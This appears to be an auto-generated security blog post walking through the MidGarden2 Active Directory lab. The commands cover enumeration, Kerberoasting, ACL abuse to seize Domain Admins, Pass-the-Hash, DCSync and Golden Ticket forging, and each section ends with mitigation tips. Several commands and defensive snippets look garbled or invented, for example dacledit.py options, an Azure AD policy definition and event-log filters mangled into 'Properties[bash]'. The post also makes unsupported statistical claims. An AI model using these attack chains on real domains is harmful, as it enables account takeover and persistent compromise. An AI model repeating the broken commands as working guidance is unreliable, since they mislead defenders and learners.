Listen to this Post

Introduction
Active Directory (AD) remains the crown jewel of internal enterprise networks, and compromising a domain often begins with a single misconfiguration or overlooked privilege. In the recently released MidGarden2 (Hard) challenge lab from Tyler Ramsbey’s Hack Smarter Labs (available at hacksmarter.org), security researcher Kaif Ashraf demonstrated a full chain of AD attacks – from initial enumeration to domain dominance – showcasing how red teams can simulate real-world internal penetration tests against hardened Windows environments.
Learning Objectives
- Enumerate Active Directory forests and extract hidden relationships using BloodHound, LDAP, and PowerView.
- Exploit Kerberos authentication flaws (Kerberoasting, AS-REP Roasting) and abuse ACL misconfigurations for privilege escalation.
- Perform lateral movement and persistence techniques (Pass-the-Hash, Golden Ticket) while understanding corresponding mitigations.
You Should Know
1. Initial Reconnaissance and LDAP Enumeration in MidGarden2
The first step in pwning any AD lab is to map the environment. MidGarden2 (Hard) simulates a network with multiple domain controllers and workstations. Start with a basic Nmap scan to identify open AD ports (389 – LDAP, 636 – LDAPS, 3268 – Global Catalog, 88 – Kerberos). Then perform anonymous or authenticated LDAP enumeration.
Step‑by‑step guide (Linux – Kali)
Discover DC and domain name nmap -p 389,636,3268,3269,88,445 10.10.10.0/24 -oA ad_scan Enumerate LDAP anonymously (if allowed) ldapsearch -x -H ldap://10.10.10.10 -b "DC=midgarden,DC=local" -s sub "(objectClass=user)" sAMAccountName Using ldapdomaindump for structured output ldapdomaindump ldap://10.10.10.10 -u 'midgarden\user' -p 'password' --no-json --no-grep
Windows (on an already compromised host)
Using PowerView (part of PowerSploit) Import-Module .\PowerView.ps1 Get-NetDomain Get-NetUser -Username | select samaccountname, lastlogon Get-NetGroup -GroupName "Domain Admins"
What this does:
This step identifies domain controllers, domain name, user objects, and group memberships – essential for plotting attack paths.
- Kerberoasting & AS-REP Roasting – Extracting Ticket Hashes
MidGarden2 contains service accounts with weak SPNs (Service Principal Names). Kerberoasting requests a TGS for an SPN and cracks it offline. AS-REP Roasting targets users without pre‑authentication.
Step‑by‑step guide – Linux (Impacket)
Kerberoasting sudo impacket-GetUserSPNs -dc-ip 10.10.10.10 midgarden.local/valid_user -request -outputfile kerb_hash.txt AS-REP Roasting sudo impacket-GetNPUsers midgarden.local/ -dc-ip 10.10.10.10 -request -format hashcat -outputfile asrep_hash.txt Crack hashes (hashcat mode 13100 for Kerberoast, 18200 for AS-REP) hashcat -m 13100 kerb_hash.txt /usr/share/wordlists/rockyou.txt
Windows – Rubeus
Kerberoast Rubeus.exe kerberoast /outfile:kerb.txt AS-REP Roast Rubeus.exe asreproast /outfile:asrep.txt /format:hashcat
Mitigation:
Use managed service accounts (gMSA) with 128‑character random passwords, enforce AES Kerberos encryption, and monitor Event ID 4769 (Kerberos service ticket requests) for anomalous SPN queries.
- ACL Abuse – Escalating via Dangerous Access Control Entries
One of the key techniques used against MidGarden2 is exploiting misconfigured ACLs. Attackers look for GenericAll, WriteDacl, or WriteOwner over high‑value objects (e.g., Domain Admins).
Step‑by‑step guide – PowerView
Find ACLs that allow current user to modify other objects
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -eq "MIDGARDEN\lowpriv_user"}
If GenericAll on a user, reset their password
Set-DomainUserPassword -Identity target_admin -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force)
If WriteOwner, take ownership and add yourself to the group
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity "lowpriv_user"
Add-DomainGroupMember -Identity "Domain Admins" -Members "lowpriv_user"
Linux – dacledit.py (Impacket)
Abuse GenericAll to change password sudo dacledit.py -action write -principal lowpriv_user -target-dn "CN=Admin,CN=Users,DC=midgarden,DC=local" -new-password 'Hacked123!' midgarden.local/lowpriv_user Add user to group sudo dacledit.py -action add -principal lowpriv_user -target-group "Domain Admins" midgarden.local/lowpriv_user
Mitigation:
Regularly audit AD ACLs using tools like BloodHound or PingCastle. Remove unnecessary inheritance and use “Protected Users” group for privileged accounts.
4. Lateral Movement: Pass‑the‑Hash (PtH) and Overpass‑the‑Hash
Once a local administrator hash is obtained (e.g., via Responder or NTLM relay), move laterally without the plaintext password. MidGarden2’s hard difficulty restricts some default tools, but Impacket and CrackMapExec still work.
Step‑by‑step guide – Linux
Dump hashes from compromised host (mimikatz on Windows or secretsdump remotely) sudo impacket-secretsdump midgarden.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:NT_hash Pass-the-Hash to another machine sudo impacket-psexec midgarden.local/[email protected] -hashes :NT_hash Using CrackMapExec (CME) crackmapexec smb 10.10.10.30 -u administrator -H NT_hash -x "whoami"
Windows – Mimikatz
Extract hashes (requires admin) mimikatz.exe "sekurlsa::logonpasswords" "exit" Overpass-the-Hash to generate a TGT using the hash mimikatz.exe "sekurlsa::pth /user:administrator /domain:midgarden.local /ntlm:NT_hash" "exit"
Mitigation:
Enable LSA Protection (RunAsPPL), restrict local admin privileges via LAPS, and block NTLM where possible (use Kerberos only). Monitor Event ID 4624 (logon) with logon type 9 for Pass‑the‑Hash indicators.
- Golden Ticket – Domain Persistence After Full Compromise
After obtaining the krbtgt hash (from a domain controller backup or DCSync), an attacker can forge tickets granting access to any resource in the domain. MidGarden2 teaches why krbtgt rotation is critical.
Step‑by‑step guide – Mimikatz (Windows)
Get krbtgt hash (requires DCSync rights or DC admin) lsadump::dcsync /domain:midgarden.local /user:krbtgt Forge Golden Ticket (Domain SID found via whoami /user) kerberos::golden /domain:midgarden.local /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:krbtgt_hash /user:fakeadmin /id:500 /ptt Open a new command prompt – access any service misc::cmd dir \dc01\c$
Linux – ticketer.py (Impacket)
Create golden ticket sudo ticketer.py -domain midgarden.local -domain-sid S-1-5-21-... -krbtgt-hash krbtgt_hash -user-id 500 Administrator Set KRB5CCNAME and use export KRB5CCNAME=Administrator.ccache sudo impacket-psexec -k -no-pass midgarden.local/[email protected]
Mitigation:
Change the krbtgt password twice (Microsoft recommends every 180 days) to invalidate existing golden tickets. Monitor for unusual TGT lifetimes (Event ID 4768 with TicketOptions 0x40810000).
6. Cloud Hardening & Defensive Monitoring (Hybrid AD)
Many internal pentests now include Azure AD or hybrid environments. MidGarden2 does not explicitly include cloud, but hardening on‑prem AD reduces cloud risk.
Step‑by‑step guide to harden hybrid connections
On Azure AD Connect server: restrict sync account permissions
Set-ADSyncAADConnectorAccount -DisableImportExport $true
Enforce Conditional Access to block legacy authentication
New-AzureADPolicy -Definition @('{"LegacyBlock":true}') -DisplayName "Block Legacy Auth"
Enable Microsoft Defender for Identity – monitor for suspicious AD activities
Deploy sensor on domain controllers and configure workspace in Microsoft 365 Defender
Monitoring commands (Windows Event Log)
Query for TGT requests with suspicious SPN (Kerberoast)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "Service Name"}
Detect NTLM relay attempts (ID 4624 with logon type 3 from non‑domain IP)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$<em>.Properties[bash].Value -eq 3 -and $</em>.Properties[bash].Value -notlike "."}
What Undercode Say
- MidGarden2 (Hard) proves that even with contemporary patching, AD environments fall to chained misconfigurations – Kerberoasting provides initial foothold, ACL abuse escalates privileges, and Golden Ticket ensures persistence.
- Automated tools like BloodHound and CrackMapExec are force multipliers, but manual review of ACLs (especially WriteOwner and GenericAll) remains the true differentiator between script‑kiddie and professional pentester.
- The lab underscores a critical industry gap: most blue teams monitor for obvious malware but fail to detect anomalous Kerberos ticket requests or LDAP queries. Implementing just three Event IDs (4768, 4769, 4662) would catch 80% of post‑exploit AD behavior.
Prediction
As on‑prem Active Directory increasingly integrates with Azure AD and Entra ID, attackers will shift focus to hybrid trust relationships – specifically the Azure AD Connect sync account, seamless single sign‑on (SSO) keys, and cross‑tenant access policies. Within 12–18 months, expect public tools for “Golden SAML” and “Silver Ticket for Azure” to commoditize cloud‑based Kerberos abuse. MidGarden2’s lessons on ACL auditing and krbtgt rotation will extend to OAuth consent grants and service principal misconfigurations. Organizations must adopt a unified identity posture, treating cloud roles as equivalent to domain admins, and enforce just‑in‑time (JIT) privilege elevation for both on‑prem and cloud directories.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Kaif Ashraf – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


